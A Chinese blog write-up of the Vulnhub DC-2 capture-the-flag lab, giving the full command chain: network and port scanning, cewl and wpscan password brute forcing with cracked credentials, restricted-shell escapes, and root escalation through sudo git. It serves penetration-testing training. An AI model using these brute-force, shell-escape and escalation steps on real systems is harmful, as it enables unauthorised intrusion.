【Vulnhub靶机系列】DC2

最新推荐文章于 2024-03-20 23:38:08 发布
最新推荐文章于 2024-03-20 23:38:08 发布
阅读量551 收藏 2
点赞数
文章标签: linux centos ssh git 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/116141639
版权

文章来源|MS08067 安全实验室

本文作者:大方子(Ms08067实验室核心成员)

基本信息

Kali:192.168.61.145

DC2:192.168.61.162

实验过程

在Kali中先进行内网探活

sudo arp‐scan ‐‐interface eth0 192.168.61.1/24

排查筛选得知,192.168.61.162为DC2的IP地址。

接下来用Nmap对DC2进行端口扫描

nmap ‐sC ‐sV ‐p- ‐oA ~/vulnhub/DC2 192.168.61.162

可知DC2开启了80端口和7744端口,根据信息可知7744端口为SSH

我们先访问下DC2的80端口

返回一个错误页面,F12可以看到网页做了一个301永久重定向

我们编辑下Kali的hosts文件

sudo vim /etc/hosts

添加一条

192.168.61.162 dc‐2

再次用kali打开dc-2,即可正常显示

在页面中即可找到flag1

Flag 1: Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another.

Flag1提示我们要使用cwel来生成密码字典

cewl dc‐2 > pwd.txt

使用wpscan可以扫出当前wp的漏洞

wpscan ‐‐url http://dc‐2/

我们用wpscan枚举出当前存在的用户,并存入username.txt中

wpscan ‐‐url http://dc‐2 ‐e u

然后我们用刚刚生成的username.txt和pwd.txt进行账号密码遍历

wpscan ‐‐url http://dc‐2/ ‐U username.txt ‐P pwd.txt

[SUCCESS] ‐ jerry / adipiscing
[SUCCESS] ‐ tom / parturient

然后我们打开wp的管理后台,一般都是wp-admin

http://dc‐2/wp‐admin

先登录jerry的账号,发现flag2

Flag 2: If you can't exploit WordPress and take a shortcut, there is another way. Hope you found another entry point.

flag2说我们无法攻击WP,我们需要寻找别的方法 

然后登录tom没有什么额外的发现 

靶机除了80还有7744(SSH)端口,我们也可以用这2个账号尝试下 

jerry无法登录SSH,但是tom是可以顺利登录SSH

我们先看看tom可以执行那些命令

tom@DC‐2:~$ echo $PATH
tom@DC‐2:~$ echo /home/tom/usr/bin/*

可以看到只能执行less,ls,scp,vi 

我们ls下发现flag3.txt,在用less获取flag3的内容

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes

感觉这句话的意思像是提示我们要su到jerry,但是我们无法使用su命令

所以我们需要绕过rbash(受限的bash)

tom@DC‐2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC‐2:~$ export PATH=$PATH:/bin/
tom@DC‐2:~$ export PATH=$PATH:/usr/bin

然后我们切换到jerry,密码为adipiscing

切换到jerry的家目录就可以得到flag4.txt

查找下suid文件

find / ‐perm ‐u=s ‐type f 2>/dev/null

并没有像dc-1那样可以利用find 

那么我们看看jerry有没有可以执行的具有root权限的命令

sudo ‐l

这里有一个很明显的git命令,还是不需要密码的

去网上找下利用git命令提权的文章

https://www.cnblogs.com/zaqzzz/p/12075132.html#3git%E6%8F%90%E6%9D%83

jerry@DC‐2:~$ sudo git ‐p help
!/bin/bash

得到最后的final-flag

额外内容

rbash另一种绕过方式

# vi编辑shell
# 命令模式分别输入 :set shell=/bin/bash
:shell
tom@DC‐2:~$ vi shell
tom@DC‐2:~$ export PATH=/usr/sbin:/usr/bin:/sbin:/bin
tom@DC‐2:~$ su jerry
Password:
jerry@DC‐2:/home/tom$

另一种查看当前用户可用命令方式

compgen ‐c

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

 

 

目前40000+人已关注加入我们

Ms08067安全实验室
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
DC-2靶机详细渗透过程
MRS_jianai的博客
11-30 1071
对DC-2靶机的渗透过程和收获总结
DC-2靶机渗透全流程详细
最新发布
qq_63940076的博客
03-20 1288
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2靶机渗透测试
读书 买花 长大
04-01 275
DC-2
【DC系列】DC-2靶场
qq_51611948的博客
02-14 1082
详细介绍DC2靶机渗透全过程
DC-2靶机详解
TonyChaoWei的博客
02-07 1282
上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub--DC2
weixin_55129870的博客
05-12 1234
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
看完这篇 教你玩转渗透测试靶机vulnhub——DC2
Aluxian_的博客
03-22 3785
Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址: ...
DC-2靶机攻略
weixin_43179779的博客
10-16 1768
DC-2靶机攻略
Vulnhub DC2
qq_45746876的博客
08-13 329
Vulnhub DC2靶机学习
【DC-2靶机
qq_40646572的博客
05-04 1869
信息搜集 通过nmap扫描,发现dc2靶机存在80端口以及7744端口。 通过nmap中的-sV指令发现7744端口是ssh端口。 通过nmap中的script的脚本扫描,发现用户名,先保存下。 打开dc2靶机,发现dns解析错误。配置下hosts文件。 Flag搜集 找到flag1。提示使用cewl爬取单词生成字典。 可能存在Ssh爆破,或者http爆破。 经过目录扫描,发现后台。 通过hydra工具爆破http服务。获取到两个登录用户。 存在两个账号: useraname:
DC_2 靶机夺旗
猎荒者
12-17 1750
前言 学习 DC 靶机系列,获益良多。随笔一篇,用于记录。 1 环境准备 攻击机:Kali 靶机:DC_2 搭载环境:VMware Workstation 15 Pro 网络设置:NAT 2 目标 攻下五座堡垒,拿到 root 权限,以五面旗帜为证。 3 征战 3.1 信息收集 ① 确定网段 在 Kali 中输入命令:ifconfig,得到 IP :192.168.11.158 ② 发现主机 ...
DC-2靶机渗透
weixin_45349299的博客
01-02 604
title: DC-2靶机渗透详解 date: 2022-1-1 23 :38 :36 tags: DC系列靶机 categories: 学习笔记kali攻击机:192.168.1.103靶机:192.168.2.102,以10000的速率扫描靶机的所有端口,对指定端口的服务做综合详细扫描打不开192.168.2.108:80的原因:没有在本地设置hosts本地hosts文件位置:C:\Windows\System32\drivers\etc添加192.168.2.102 dc-2然后用更新dns缓存查询D
vulnhub靶机系列
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值